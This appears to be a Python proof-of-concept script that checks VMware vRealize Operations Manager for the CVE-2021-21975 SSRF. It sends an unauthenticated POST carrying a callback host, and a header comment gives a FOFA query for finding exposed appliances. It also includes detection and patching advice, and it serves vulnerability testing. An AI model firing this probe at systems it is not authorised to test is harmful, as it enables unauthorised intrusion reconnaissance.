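# CVE-2021-21975
# fofa:title=“vRealize Operations Manager”
"""Interactive check for the vRealize Operations Manager SSRF (CVE-2021-21975).

The script sends one POST, without credentials, to ``/casa/nodes/thumbprints``
with a JSON array holding a single callback host name. It reports the HTTP
status and the response body.

How to read the result:

* HTTP 200 only means the endpoint accepted the request. The finding is
  confirmed only if the callback host (the "DNSLog" value) records a lookup
  or connection coming from the appliance.
* Any other status is not proof that the appliance is patched. A proxy, a WAF
  or a wrong base URL gives the same outcome.

For detection and remediation: this request appears in the appliance's web
access logs as a POST to ``/casa/nodes/thumbprints``. Apply the vendor's fix
for this CVE and keep the management interface off untrusted networks.
"""
import json

import requests
import urllib3

# The probe uses verify=False because these appliances commonly present
# certificates the client does not trust. Silence only that specific warning,
# not every urllib3 warning. With verification off, the peer is not
# authenticated, so the reply may come from an intermediary.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

_ENDPOINT_PATH = "/casa/nodes/thumbprints"


def title():
    """Print the tool banner."""
    print("[-------------------------------------------------------------]")
    print("[-------- VMware vRealize Operations Manager SSRF漏洞 ---------]")
    print("[-------- CVE-2021-21975 ----------]")
    print("[-------- use:python3 CVE-2021-21975 ------------]")
    print("[-------- Author:Henry4E36 ------------]")
    print("[-------------------------------------------------------------]")


def target_url(url, dnslog):
    """Send the probe to *url* and print what the appliance answered.

    Args:
        url: Base URL of the appliance, including the scheme. A trailing
            slash is tolerated.
        dnslog: Host name of the out-of-band listener that records the
            callback.

    Returns:
        None. The outcome is printed. Request failures are reported rather
        than raised.
    """
    # Strip a trailing slash so the path does not become "//casa/...".
    endpoint = url.rstrip("/") + _ENDPOINT_PATH
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0",
        "Content-Type": "application/json;charset=UTF-8",
    }
    # Serialise with json.dumps so that a quote or backslash in the value
    # cannot produce a malformed body (the f-string version did).
    body = json.dumps([dnslog])
    try:
        res = requests.post(
            url=endpoint,
            headers=headers,
            data=body,
            verify=False,
            timeout=5,
        )
    except requests.RequestException as e:
        print("[!] 目标系统出现意外错误!\n", e)
        return

    if res.status_code == 200:
        # A 200 is only an indicator; the callback log is the evidence.
        print(f"[!] \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m")
        print(f"[0] 响应为:{res.text}")
    else:
        # Report the status code and avoid claiming "not vulnerable":
        # a non-200 answer alone does not establish that.
        print(
            f"[0] 目标系统: {url} 返回状态码 {res.status_code},"
            "未发现SSRF迹象(不能据此排除漏洞)"
        )


if __name__ == "__main__":
    title()
    url = input("[-] 请输入需要检测的URL:\n").strip()
    dnslog = input("[-] 请输入DNSlog:\n").strip()
    target_url(url, dnslog)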